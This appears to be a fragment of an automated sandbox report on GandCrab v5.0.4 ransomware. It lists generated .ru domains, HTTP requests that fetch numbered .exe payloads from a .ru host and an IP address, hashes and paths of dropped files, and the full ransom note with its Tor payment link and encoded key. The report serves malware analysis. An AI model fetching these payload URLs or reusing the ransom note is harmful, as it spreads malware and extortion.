rgsouhdoauenodaeufb.ru [VT]
eoguaonedonaodabobg.ru [VT]
gouaondoaudbaebobgu.ru [VT]
giohuoaehdoueofbaur.ru [VT]
gnaoedoaoounauubueu.ru [VT]
gbobaebaodebuoueofu.ru [VT]
srgouosehohedohaeoh.ru [VT]

HTTP Requests

URI Data
http://slpsrgpsrhojifdij.ru/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://slpsrgpsrhojifdij.ru/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: slpsrgpsrhojifdij.ru

http://92.63.197.48/m/1.exe
GET /m/1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/2.exe
GET /m/2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/3.exe
GET /m/3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/4.exe
GET /m/4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/m/5.exe
GET /m/5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/1.exe
GET /1.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/2.exe
GET /2.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/3.exe
GET /3.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/4.exe
GET /4.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

http://92.63.197.48/5.exe
GET /5.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0
Host: 92.63.197.48

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

Source Destination ICMP Type Data
192.168.35.21 8.8.8.8 3

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Suricata Extracted Files

No Suricata extracted files.

JA3

No JA3 hashes found.

File name winsvcs.exe
Associated Filenames
C:\Windows\5769805074060605\winsvcs.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
File name 1865041414.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 2910f240138e190e7909b166df3698dc
SHA1 3c4ce87d71fe2ff5c5482017317105d516a8f8e0
SHA256 a4cff3dfa592efc374054229cef177964b410a8b51646aee5e2a44c6c946e2c3
CRC32 736321C4
Ssdeep 6:idqmVg3F+X32QdGRcOkctC6h1p+21/Jt/nSeUyp+El:eNGSGQdG2T6h1saJ1SeUyn
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
File name 2841536727.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 1c2cd2dbb035e97cd38f9c51ce6e6b40
SHA1 bc429685689a09fbb7eac5814899425cb0fe6322
SHA256 8c20cc2cb85cf646e618be7453c6bb7e3e4837a23013c78320feec11ab7d8383
CRC32 4EF87629
Ssdeep 6:idqgHVg3F+X32r0fRtBLRaTwa/PqkYdwWTcgWtCtQUelICPLM0S+8spF:e31GSGIRtBtgPqkYd3Tc26lIC40S+8sr
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
File name 3751939260.exe
Associated Filenames
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
File Size 519 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 5fcf44eaa8ca2270d84ca777ca1166b9
SHA1 f57924ed272aacfcf111f2def00cee27797a81d2
SHA256 053aae9673b5a901e216224226775eec30670f2bef2ee4f5c172d89b3387a478
CRC32 E754F246
Ssdeep 6:idquvVg3F+X32wfH1Wtw4vl+t/66h1ZO6OScSM1/st8g0:e1GSGw/1WtNvEtC6h1wlScSM1ll
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
File name winsvcs.exe
Associated Filenames
C:\Windows\806084767800850\winsvcs.exe
File Size 539648 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 cb9d7ff8deb972b96917e88e0d56adac
SHA1 8ca2b46c42c7b413e9a24bdf2790f9260af0facf
SHA256 c2cb48209e590289e62a2e461ef9b00078b104aa359bdc02b64c695c9eb8cd27
CRC32 2161DC8B
Ssdeep 3072:G7UpE9lqoZ/WLpwsUPg7YSU2RrygKjFvwwwwwwlwwwwww2wwww4ByXrMlseFaEkX:G7V93ZeLpw1eU2RrygKFErMeeF3k
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
File name SFEHI-DECRYPT.txt
Associated Filenames
C:\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\SFEHI-DECRYPT.txt
C:\$Recycle.Bin\S-1-5-21-120665959-548228820-2376508522-1001\SFEHI-DECRYPT.txt
C:\Documents and Settings\SFEHI-DECRYPT.txt
C:\Drivers\SFEHI-DECRYPT.txt
C:\Hotfix\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x64\SFEHI-DECRYPT.txt
C:\Hotfix\LocalPack\x86\SFEHI-DECRYPT.txt
C:\Hotfix\Update\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x64\SFEHI-DECRYPT.txt
C:\Hotfix\Update\x86\SFEHI-DECRYPT.txt
C:\MSOCache\SFEHI-DECRYPT.txt
C:\PerfLogs\SFEHI-DECRYPT.txt
C:\PerfLogs\Admin\SFEHI-DECRYPT.txt
C:\Program Files\SFEHI-DECRYPT.txt
C:\Program Files (x86)\SFEHI-DECRYPT.txt
C:\Python27\SFEHI-DECRYPT.txt
C:\Python27\DLLs\SFEHI-DECRYPT.txt
C:\Python27\Doc\SFEHI-DECRYPT.txt
C:\Python27\include\SFEHI-DECRYPT.txt
C:\Python27\Lib\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\SFEHI-DECRYPT.txt
C:\Python27\Lib\bsddb\test\SFEHI-DECRYPT.txt
File Size 8610 bytes
File Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF line terminators
MD5 5ade76d2778be177eaa35a40af3b9a06
SHA1 ca0af4b52b433e02a49179ee7cb0eed74dd274c9
SHA256 b5469d75562851c404bb42676114f22773089d12c0f6b040857233e372d631bb
CRC32 3F415712
Ssdeep 192:ab5hf7qDi8o84VBIT+G00hKeKU4ybMO5y4DnLj:W5hjbBtIC5eTJbMm/
ClamAV None
Yara None matched
CAPE Yara None matched
VirusTotal Search for Analysis
Display Text
---=    GANDCRAB V5.0.4  =---

***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************

*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****

Attention!

All your files, documents, photos, databases and other important files are encrypted and have the extension: .SFEHI

The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.

The server with your key is in a closed network TOR. You can get there by the following ways:

----------------------------------------------------------------------------------------------

| 0. Download Tor browser - https://www.torproject.org/

| 1. Install Tor browser
| 2. Open Tor Browser
| 3. Open link in TOR browser:   http://gandcrabmfe6mnef.onion/fbc2ce59a4889f95
| 4. Follow the instructions on this page

----------------------------------------------------------------------------------------------

On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.

ATTENTION!

IN ORDER TO PREVENT DATA DAMAGE:

* DO NOT MODIFY ENCRYPTED FILES
* DO NOT CHANGE DATA BELOW

---BEGIN GANDCRAB KEY---

\x00l\x00A\x00Q\x00A\x00A\x00P\x00W\x00P\x00R\x008\x008\x00e\x00u\x00C\x001\x00H\x00A\x00e\x00g\x00d\x00F\x00h\x00z\x00F\x00z\x00k\x00i\x00D\x00/\x003\x00A\x00t\x00Y\x00m\x00J\x00d\x00s\x00y\x009\x00o\x00O\x00C\x00Y\x00I\x00H\x004\x00v\x00e\x00L\x00h\x00H\x00i\x00M\x00e\x00q\x000\x00T\x00k\x00r\x00U\x00d\x00/\x00s\x00B\x00Z\x008\x00u\x00Q\x00A\x00x\x003\x00a\x00/\x00V\x002\x00R\x00+\x004\x00f\x00n\x00e\x00Z\x00Q\x00a\x00E\x00R\x00T\x00P\x006\x00W\x00C\x00W\x00G\x00J\x00i\x00H\x00C\x00s\x00Q\x004\x00v\x00Q\x001\x00R\x00b\x00l\x00t\x00M\x00/\x00V\x00l\x00A\x001\x00B\x00l\x000\x00/\x00D\x00Q\x00i\x00c\x003\x00I\x00Y\x00V\x00S\x00P\x00d\x00b\x00U\x00V\x00l\x000\x00m\x003\x00v\x00h\x00C\x00p\x000\x00y\x008\x00g\x00d\x00T\x00k\x00d\x00s\x00d\x00/\x00x\x00v\x00H\x008\x00O\x00J\x00H\x00d\x00j\x00D\x00m\x00P\x007\x00f\x00f\x000\x00m\x00z\x00y\x00z\x00x\x00J\x00j\x00y\x009\x00I\x00+\x005\x00/\x00X\x00W\x00Z\x009\x00U\x008\x00c\x00E\x00o\x00j\x00b\x00J\x006\x00C\x00O\x006\x00H\x000\x00Q\x00O\x00j\x00W\x00M\x00U\x00I\x00B\x00a\x00C\x00c\x00B\x00V\x00e\x005\x005\x00b\x00r\x004\x00h\x00x\x00h\x00W\x00n\x000\x00D\x00K\x009\x004\x00+\x00V\x00j\x00Z\x00o\x00n\x00H\x00q\x00/\x00G\x00Y\x00E\x00J\x00z\x005\x00g\x00x\x00e\x006\x00K\x00N\x00P\x00t\x00j\x00T\x00c\x00m\x001\x006\x00Z\x00k\x00v\x009\x00x\x00J\x00J\x00S\x000\x00v\x00f\x00F\x00o\x00R\x00s\x003\x00U\x00r\x00A\x00F\x00j\x00r\x00Q\x006\x00I\x00g\x00q\x00p\x00D\x00F\x00w\x006\x003\x00y\x00g\x00s\x00t\x00m\x000\x00k\x00i\x009\x00x\x00r\x00p\x00a\x00t\x00x\x00p\x00o\x00s\x00Y\x00r\x00q\x00m\x00t\x00Z\x000\x00h\x00T\x00O\x00U\x00d\x00h\x00B\x00Y\x00n\x00E\x00b\x00k\x00m\x00R\x00B\x007\x008\x00c\x00M\x00B\x00A\x00y\x00m\x00H\x00u\x00H\x00k\x00Z\x00C\x008\x000\x00j\x00Y\x00F\x002\x00R\x00j\x005\x00R\x00t\x00T\x00D\x00O\x00f\x00Q\x00K\x00t\x00R\x00h\x00A\x002\x00B\x00d\x00n\x00i\x00Q\x00K\x008\x00+\x00l\x00N\x006\x00y\x00K\x00c\x00I\x00R\x00e\x00L\x00e\x005\x003\x00n\x00l\x00c\x00p\x00+\x00K\x00w\x00c\x00q\x00y\x00o\x00z\x00z\x00j\x00o
\x00I\x00o\x00e\x00U\x000\x00L\x00X\x00/\x00b\x00E\x00V\x00X\x00s\x00w\x00V\x00l\x00c\x008\x00L\x002\x00o\x00G\x00C\x00D\x00Y\x00o\x001\x00t\x009\x000\x00d\x00T\x00Q\x000\x00M\x00P\x00W\x00E\x00y\x00a\x00P\x00V\x00L\x009\x00a\x00d\x00Z\x00i\x00R\x00S\x00k\x00E\x00O\x00L\x00V\x00y\x00j\x00k\x00I\x00Y\x00a\x00Y\x00L\x009\x00z\x00Y\x00D\x00K\x00l\x00H\x00a\x00q\x00x\x00c\x00S\x00G\x00R\x00q\x00c\x00W\x003\x00k\x00K\x005\x00S\x00y\x00U\x00A\x00w\x00a\x00a\x00h\x00U\x00m\x00m\x00W\x00S\x00j\x00f\x00+\x00z\x001\x00j\x00n\x00o\x00h\x00z\x005\x00e\x00M\x00G\x000\x00l\x00K\x00W\x001\x00H\x00w\x00U\x00E\x00h\x001\x00U\x00N\x00O\x00m\x00U\x00q\x00f\x007\x00D\x00M\x00M\x00V\x00i\x00v\x007\x00t\x004\x00h\x00l\x00j\x00q\x00p\x00c\x00f\x00g\x00b\x00n\x00n\x00I\x00F\x00N\x00k\x006\x00d\x00X\x007\x00R\x00N\x00Y\x00F\x00m\x00F\x00g\x00A\x008\x00R\x00B\x00N\x00l\x005\x000\x00a\x00M\x00y\x007\x007\x00E\x00W\x00P\x00P\x00m\x008\x00q\x00i\x00g\x006\x00z\x002\x00h\x00D\x00X\x00V\x00+\x00N\x00N\x00N\x00h\x00G\x00i\x00g\x00A\x008\x00q\x00v\x001\x007\x00i\x00N\x00Y\x00i\x00M\x00p\x00/\x00h\x00M\x00M\x002\x00/\x00O\x00m\x000\x00V\x00U\x00P\x00+\x004\x00C\x007\x00V\x00w\x00R\x008\x00R\x009\x007\x00R\x00k\x00q\x00o\x003\x003\x00R\x002\x00j\x00n\x00y\x00P\x004\x009\x00z\x006\x00z\x00j\x00p\x00Q\x000\x00B\x00L\x00G\x00x\x00Q\x00C\x00V\x00w\x00e\x00P\x00s\x00H\x005\x00b\x00D\x00y\x00n\x00B\x00D\x00m\x00t\x001\x00D\x00B\x00p\x00p\x00Q\x00G\x00t\x00P\x00k\x00a\x00o\x00u\x00B\x00i\x003\x004\x00u\x00F\x00m\x00c\x00K\x00a\x00G\x00W\x00T\x00Z\x00z\x00B\x00r\x00Y\x00z\x00F\x00x\x00h\x00m\x001\x000\x00j\x00Y\x00Y\x00K\x00j\x00a\x00p\x006\x00y\x002\x00B\x00/\x00m\x00+\x002\x00t\x008\x00Z\x00C\x00J\x008\x00y\x00Y\x00n\x00g\x00T\x00P\x00N\x00p\x004\x00d\x00+\x00C\x00u\x002\x00L\x00F\x00F\x00R\x00o\x00S\x00C\x000\x00Q\x00r\x00X\x00/\x00d\x00D\x009\x00Y\x00B\x001\x007\x00i\x00y\x00a\x00a\x00V\x004\x003\x00S\x00q\x00p\x00M\x00L\x00J\x00F\x00b\x00J\x00p\x00U\x00C\x00j\x001\x00u\x00j\x00D\x00e\x00Q\x00f\x00E\x00y
\x00y\x00W\x00G\x00f\x00v\x00K\x00Z\x00m\x00g\x00c\x00p\x00p\x008\x00l\x00z\x002\x00K\x00S\x00V\x00V\x00G\x00V\x006\x00q\x00c\x00u\x00W\x00O\x00E\x00P\x00F\x00L\x00g\x00d\x00c\x00U\x00l\x00r\x00a\x006\x00h\x00L\x00S\x00m\x00J\x00X\x007\x00a\x00u\x00O\x00E\x00U\x00f\x00D\x00g\x00o\x00b\x00Q\x006\x00w\x00i\x00r\x00Q\x00X\x00p\x00n\x00Q\x00A\x00z\x00O\x00J\x00Q\x00L\x00x\x003\x00R\x00o\x00J\x00E\x00D\x00V\x000\x00v\x003\x00E\x00j\x001\x000\x00V\x00E\x00E\x00f\x00g\x00e\x00T\x00s\x003\x00L\x00n\x00F\x00t\x00n\x00g\x00P\x00u\x00i\x00/\x00N\x00K\x00S\x00n\x00j\x00Z\x00N\x000\x00+\x00l\x002\x00n\x00n\x00/\x00P\x00P\x00N\x00E\x00g\x00u\x00B\x000\x00f\x00/\x00M\x00P\x00T\x00e\x00A\x00I\x007\x00C\x00a\x002\x005\x00l\x00a\x00I\x00H\x00B\x001\x00a\x00x\x00f\x00f\x00W\x00t\x001\x005\x00+\x005\x00k\x00Z\x004\x00X\x00n\x00q\x000\x001\x00z\x00e\x001\x00p\x00S\x00t\x00K\x00W\x00W\x007\x00F\x00o\x00u\x001\x00T\x009\x002\x009\x00t\x00+\x00o\x00f\x00D\x008\x00j\x00u\x00A\x008\x000\x00x\x00i\x00v\x00T\x00t\x00e\x00G\x00x\x00Y\x00m\x00X\x00q\x00o\x00a\x00/\x00j\x00q\x003\x009\x00a\x00L\x00l\x00F\x00y\x00y\x00O\x00N\x00f\x00/\x005\x00a\x00T\x00C\x00m\x00R\x00y\x00g\x00y\x000\x00w\x00i\x00X\x00G\x00f\x00l\x00H\x00Z\x00V\x00/\x00t\x00P\x00M\x00i\x00y\x00R\x00j\x00K\x00v\x00X\x00N\x008\x00a\x009\x004\x00w\x00A\x00L\x00i\x00s\x00Y\x00K\x00v\x00s\x00M\x00N\x00W\x00m\x004\x00/\x00P\x00A\x00u\x00L\x00L\x00i\x00Z\x00p\x00A\x00B\x00O\x00D\x00+\x00W\x00I\x003\x00l\x00w\x009\x00X\x00n\x00n\x00D\x00m\x00/\x00p\x00/\x007\x00n\x00W\x004\x00Q\x00N\x00B\x00V\x00F\x00d\x002\x000\x00n\x001\x00l\x00L\x00u\x00O\x00y\x00O\x003\x00s\x009\x00x\x00E\x00z\x00Z\x00W\x00r\x002\x00X\x00k\x00I\x00R\x00+\x00T\x00U\x00b\x00k\x005\x00c\x00a\x008\x00A\x00e\x00c\x00R\x00H\x00e\x004\x00U\x00F\x00n\x004\x00V\x00C\x00A\x005\x00d\x00x\x00n\x00m\x00K\x00r\x00n\x00H\x00c\x00n\x001\x00U\x00/\x00E\x00Z\x00b\x00Z\x00i\x00r\x00I\x00X\x00p\x00O\x007\x00J\x00u\x00q\x00P\x00l\x00c\x00Q\x00A\x00C\x00h\x00G\x00z\x00R\x00O\x00C\x00Q\x00M
\x00K\x008\x00K\x00L\x00U\x00j\x00l\x004\x009\x00p\x00+\x00x\x00h\x00l\x001\x00b\x00y\x002\x00Y\x00K\x00X\x00K\x00T\x00J\x00Q\x00I\x00l\x00F\x00B\x00V\x00Z\x00D\x00S\x00J\x00q\x00H\x00J\x00H\x00E\x00y\x00B\x00O\x00M\x00P\x008\x00D\x007\x00g\x00R\x00y\x005\x00n\x000\x00t\x00o\x00X\x00h\x00h\x00q\x007\x00C\x00+\x004\x00q\x00c\x00Q\x006\x002\x00i\x00H\x00q\x00T\x00W\x00o\x00i\x00k\x00H\x00I\x00H\x00m\x00A\x00g\x00y\x00g\x00D\x00G\x00I\x00m\x00j\x00+\x00R\x00l\x00L\x005\x007\x00e\x00X\x00l\x000\x00a\x00C\x00M\x00M\x002\x00E\x002\x00e\x005\x00J\x00l\x00V\x00G\x000\x00D\x00k\x001\x00u\x00g\x00m\x00m\x00p\x00i\x00a\x00N\x00o\x00A\x00o\x00m\x00O\x001\x00M\x00y\x00Y\x00v\x00f\x00r\x00q\x00B\x00V\x003\x00R\x00V\x00P\x00O\x007\x005\x00v\x009\x00w\x007\x00p\x00Y\x00z\x00h\x00q\x00M\x00V\x00Q\x00/\x00l\x00V\x00e\x00f\x00L\x00O\x00T\x00J\x00j\x00b\x00t\x00X\x00Q\x00z\x00+\x00X\x00E\x00v\x00c\x00v\x005\x00C\x00h\x00v\x00m\x00z\x00s\x00C\x00p\x00i\x006\x00S\x009\x003\x00m\x00K\x002\x00i\x00B\x00+\x00A\x00A\x00U\x005\x00/\x00C\x00X\x00k\x00r\x00D\x00S\x00n\x00b\x00c\x00a\x00/\x000\x00k\x00W\x00/\x00N\x00v\x00Z\x00w\x00c\x000\x00l\x00S\x00I\x00e\x00Q\x00Z\x00v\x00a\x00U\x004\x00S\x00+\x005\x00h\x00B\x00i\x00S\x00b\x007\x00l\x00P\x00q\x005\x000\x00f\x007\x003\x00F\x00h\x00i\x004\x00+\x00t\x00+\x00o\x00N\x00U\x00d\x00f\x00H\x00n\x00s\x00V\x00r\x00i\x00r\x00T\x00H\x002\x00G\x00x\x00/\x00U\x00s\x00A\x00s\x00n\x00c\x00R\x009\x00k\x00G\x00N\x00B\x00h\x00N\x006\x009\x00/\x006\x009\x00N\x00l\x00N\x00P\x00S\x00b\x00e\x00A\x00q\x00k\x00l\x00X\x00V\x00S\x00R\x00G\x000\x00o\x00F\x00/\x00c\x00S\x00R\x00f\x005\x00A\x002\x008\x00A\x00+\x00g\x00i\x00S\x00U\x00g\x00c\x00j\x00x\x005\x007\x00A\x00S\x006\x00q\x00V\x00R\x00h\x00C\x00C\x00R\x009\x00b\x008\x00X\x00i\x00q\x00p\x00D\x001\x003\x00r\x00Q\x00O\x00H\x00+\x00o\x00r\x00v\x009\x00z\x005\x005\x00Z\x00c\x00+\x00R\x00I\x00j\x00z\x00t\x00l\x00i\x00h\x00f\x003\x00u\x00Q\x00C\x006\x00z\x00d\x00g\x00a\x00t\x00s\x00+\x00d\x005\x00O\x00K\x006\x00n\x00c\x00w
\x00h\x00Y\x005\x00i\x009\x00C\x00q\x00z\x00q\x000\x00Y\x00h\x00q\x00E\x00q\x00J\x00p\x00u\x00P\x00Z\x00j\x00X\x00L\x00n\x00m\x00O\x00N\x004\x00l\x00n\x00n\x00R\x00v\x00S\x00u\x005\x00I\x00V\x00Y\x00O\x00v\x00Y\x00Z\x00+\x00d\x00a\x008\x00H\x00C\x00A\x00b\x00f\x000\x009\x00B\x00a\x00o\x00R\x00X\x00E\x00R\x00l\x005\x00L\x00u\x00K\x00i\x00w\x00I\x00n\x00k\x00X\x008\x008\x009\x006\x00m\x008\x00a\x00K\x00L\x006\x00F\x00y\x00e\x00B\x00u\x00/\x004\x000\x001\x00h\x002\x00T\x00L\x00Y\x00U\x00H\x00u\x006\x00a\x00f\x00v\x00O\x006\x00u\x00o\x00g\x00l\x000\x00B\x00A\x00d\x00x\x00M\x00v\x00D\x00a\x00l\x00i\x008\x00P\x00A\x00w\x00R\x000\x00x\x00A\x00Z\x004\x00C\x00t\x00h\x00e\x008\x00m\x00Y\x001\x00e\x00V\x00b\x00o\x00X\x00J\x00a\x008\x00a\x00b\x00z\x00j\x00t\x00J\x00T\x00s\x00s\x00D\x00p\x002\x008\x00c\x00C\x00M\x00V\x00w\x00a\x00K\x00O\x007\x00B\x001\x00/\x00P\x00y\x00v\x00A\x00c\x00Q\x008\x00N\x009\x00s\x00y\x00L\x00D\x00r\x00/\x00z\x00S\x00h\x00C\x00v\x00I\x005\x004\x00p\x00Z\x00K\x00K\x00I\x00d\x00q\x00e\x00X\x00W\x00K\x001\x00b\x009\x00I\x00v\x002\x00D\x00Y\x002\x00N\x002\x00R\x00F\x00A\x00j\x008\x00F\x00E\x00u\x00Y\x00r\x00S\x00V\x00w\x00u\x00F\x00h\x00Q\x008\x007\x00T\x00z\x00X\x00x\x00H\x00k\x00j\x00t\x00E\x00o\x00y\x00H\x00p\x00P\x00T\x00R\x00N\x00T\x00M\x00O\x00x\x00w\x00x\x00O\x00u\x00h\x00K\x00O\x00b\x00r\x00w\x009\x00r\x00X\x00L\x00j\x00J\x00V\x00Y\x00c\x00q\x00q\x00b\x00/\x00v\x00b\x004\x00j\x00a\x00L\x00r\x00S\x00L\x00r\x00a\x00O\x009\x007\x00g\x00G\x008\x00d\x00u\x00I\x00E\x00n\x009\x007\x00Q\x00g\x00e\x00L\x00b\x00O\x00S\x00z\x00x\x007\x00/\x003\x00h\x00S\x00h\x00h\x00B\x00b\x00Q\x003\x00z\x009\x00m\x00x\x00q\x00g\x00l\x00U\x00v\x00z\x00H\x00f\x00/\x00E\x000\x00Z\x006\x004\x00a\x00T\x00a\x00k\x00p\x000\x00E\x00W\x00R\x00U\x00R\x00O\x00d\x00h\x00n\x00Q\x00l\x00E\x00g\x00f\x007\x00H\x004\x003\x00l\x00V\x00F\x00D\x003\x00l\x00W\x00u\x00I\x00O\x00S\x001\x006\x00+\x00U\x00N\x00h\x00H\x00L\x00/\x001\x00b\x001\x00M\x00S\x00Y\x009\x00i\x00m\x00u\x00f\x005\x00O\x00a\x00h
\x007\x00b\x00J\x00A\x00D\x000\x009\x00p\x00n\x006\x00v\x00A\x00C\x00o\x00H\x00y\x00g\x00k\x00y\x00b\x008\x00f\x00a\x00F\x00h\x00t\x008\x00d\x00X\x005\x00n\x009\x00b\x004\x004\x00K\x00B\x00c\x00Z\x00y\x00k\x00X\x00F\x007\x00p\x00z\x00h\x00n\x00k\x003\x00K\x00T\x00v\x00r\x00H\x00d\x00J\x00M\x00d\x00R\x00y\x00j\x00v\x00F\x006\x00k\x001\x00L\x00K\x00k\x00j\x006\x00G\x00P\x006\x00Z\x00n\x00R\x00y\x00W\x00e\x00k\x00b\x00P\x00+\x00M\x00i\x00Z\x001\x003\x00J\x00n\x00l\x00n\x003\x00o\x003\x00t\x00f\x00t\x00H\x002\x00m\x00B\x00L\x00H\x00j\x00c\x003\x002\x00O\x00u\x00b\x009\x00n\x00r\x00L\x00X\x00H\x007\x00b\x00i\x00O\x00J\x009\x00z\x00T\x00u\x00P\x009\x00S\x00p\x00T\x002\x00S\x00V\x00L\x00s\x00B\x00/\x00T\x00S\x00d\x002\x00N\x00V\x00U\x00p\x00t\x00A\x008\x00D\x00h\x00k\x00k\x00V\x00Q\x00v\x008\x004\x006\x00M\x00q\x00P\x00e\x00K\x00W\x00J\x00i\x00e\x006\x00w\x00R\x00K\x00d\x00V\x00u\x00w\x009\x00m\x00V\x00M\x003\x00Q\x00k\x00s\x00U\x000\x00x\x00K\x00d\x00t\x00R\x00Z\x001\x00a\x00F\x00t\x00q\x00R\x006\x00T\x00Q\x00e\x00e\x00c\x007\x00g\x00J\x00B\x00B\x00T\x00/\x00C\x00x\x00O\x00i\x00+\x00F\x00C\x00h\x00h\x00K\x006\x00H\x00N\x001\x00R\x006\x00Q\x00+\x00i\x00t\x00l\x00x\x006\x00x\x00q\x00J\x001\x00R\x007\x00N\x007\x00/\x00M\x00Y\x00g\x00C\x00A\x00k\x00=\x00

---END GANDCRAB KEY---

---BEGIN PC DATA---

File name agent.pyw
Associated Filenames
C:\agent.pyw
File Size 6168 bytes
File Type data
MD5 4d8e77eab1149c583ef85ba581e24bee
SHA1 d01640ea92b66dc0846942c2eee8befb05805dbf
SHA256 44d61a34a386aa8dc6ee43f530b0eaa60ffc470f644642df2a29c324959693f8
CRC32 890B9243
Ssdeep 96:SZx3cyOxS1t6Qdgj6SgC0ZShaBTboERph92YIh1F8CxoIVAA1Y8MHhzq1tL3:IxMQKQdgjLGShcRRGh1+COIVFS8tl
ClamAV None
Yara None matched
CAPE Yara None matched
File name agent.pyw.sfehi
Associated Filenames
C:\agent.pyw.sfehi
File Size 6708 bytes
File Type data
MD5 fd9cda099d9eda20dbf6700491960487
SHA1 3218b60e558422e22629cd975dd4154312631bb3
SHA256 9a40a95ca3c581a65decfa38236540ac45560806b83e49aed71ffd470546b7dc
CRC32 34E93FEC
Ssdeep 96:SZx3cyOxS1t6Qdgj6SgC0ZShaBTboERph92YIh1F8CxoIVAA1Y8MHhzq1tLVRNXI:IxMQKQdgjLGShcRRGh1+COIVFS8tk1
ClamAV None
Yara None matched
